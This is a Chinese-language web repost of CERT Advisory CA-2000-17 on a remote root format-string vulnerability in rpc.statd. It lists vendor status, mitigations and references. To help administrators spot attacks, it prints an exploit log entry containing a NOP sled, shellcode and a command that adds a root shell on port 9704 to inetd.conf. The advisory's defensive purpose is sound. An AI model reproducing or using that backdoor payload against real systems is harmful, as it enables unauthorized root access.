网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 安全漏洞 > mUnix > CERT Advisory CA-2000-17  

CERT Advisory CA-2000-17

2004-04-06  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

涉及程序:
rpc.statd
 
描述:
rpc.statd 远程溢出漏洞
 
详细:
CERT/CC 收到一个 rpc.statd 程序的安全漏洞报告。这个程序在部分 LINUX 中通常是默认安装的。
rcp.statd 守护进程存在一个安全漏洞。通过特殊格式的字符串输入到 syslog() 函数,可能允许远程攻击者覆盖 rpc.statd 堆栈中的某个返回地址,远程地执行任意命令。由于 rpc.statd 通常是以 root 身份运行,因此溢出代码会以 root 身份执行。在系统出现以下记录信息时说明 rcp.statd 这个漏洞正被使用 :
Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53
72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63
696e6961 2720676e 203a272f
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000 网管bitscn_com
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83> <8D>^(
<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp 网管联盟bitsCN@com
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
 
 
解决方案:
升级你的 rpc.statd 版本
关闭 rpc.statd 服务
使用防火墙过滤不需要的端口
 
附加信息:
厂商信息

Berkeley Software Design, Inc. (BSDI)

  不受此漏洞影响

Caldera, Inc.

  不受此漏洞影响

Compaq

  目前,Compaq 正在调查对 Compaq 的 rpc.statd 服务的潜在影响。初步的测试表明 Compaq 不受此漏洞影响。
 
Debian

  http://www.debian.org/security/2000/20000719a

FreeBSD

  不受此漏洞影响

NetBSD

  NetBSD 1.4.x 和 NetBSD 1.5 不受此漏洞影响;rpc.statd 使用 syslog() 函数时将格式化参数当成一个固定字符串进行处理。

OpenBSD

  不受此漏洞影响

RedHat

  http://www.redhat.com/support/errata/RHSA-2000-043-03.html

Silicon Graphics, Inc.

  不受此漏洞影响
 
更多的信息可在访问以下 URL: 网管bitscn_com
 * http://www.cnns.net/article/db/502.htm
 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666
 * http://www.securityfocus.com/bid/1480

CERT/CC 联系信息

  Email: cert@cert.org
 Phone: +1 412-268-7090 (24-hour hotline)
 Fax: +1 412-268-6989
 Postal address:
 CERT Coordination Center
 Software Engineering Institute
 Carnegie Mellon University
 Pittsburgh PA 15213-3890
 U.S.A.
 
相关站点:
http://www.cert.org/

TAGs     rpc.statd   漏洞   影响   信息   Compaq   root   Inc.   程序      
 上一篇:UNIX 系统格式化字符串漏洞   下一篇:SuidPerl 可能导致本地用户获得管理员权限
相关文章列表
CERT Advisory CA-2000-17 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.Unix Unzip保留解压文件setuid和setgid属
2.SMTP安全设置
3.UNIX 系统格式化字符串漏洞
4.CERT Advisory CA-2000-17
5.NetBSD SO_LINGER DIAGNOSTIC检查本地拒
6.Korn Shell 输入重定向条件竞争漏洞
7.SGI IRIX gr_osview本地文件覆盖漏洞
8.X-Windows Oversized Font Denial Of Ser
9.Sun Java System Web和Application Serve
10.NetBSD本地PTrace权限提升漏洞
最新推荐文章:
1.OpenBSD DHCPD服务程序远程栈溢出漏洞
2.NetBSD SO_LINGER DIAGNOSTIC检查本地拒
3.NetBSD本地PTrace权限提升漏洞
4.SGI IRIX gr_osview本地文件覆盖漏洞
5.SGI IRIX gr_osview本地信息泄露漏洞
6.HP Tru64 UNIX Java (TM)远程拒绝服务漏
7.Sun Java System Web和Application Serve
8.GeoHttpServer身份验证可被绕过而进入缺
9.Perl存在跨站脚本执行缺陷
10.CDE libDtHelp 缓存溢出缺陷
网管论坛交流:
·不疯魔不成活
·令你大开眼界的真正标准化机房,已整理重
·为赈灾,女孩舍身拍“裸照”
·Windows Server 2003服务器群集创建和配
·exchange2k3全套官方资料
·双儿一周岁了。。。特殊的礼物来啦。。
·存储备份技术版块守则
·无盘技术交流区守则
·DOS命令基础大全之命令详解<作者吐血
·Windows XP 操作系统默认设置需要注意的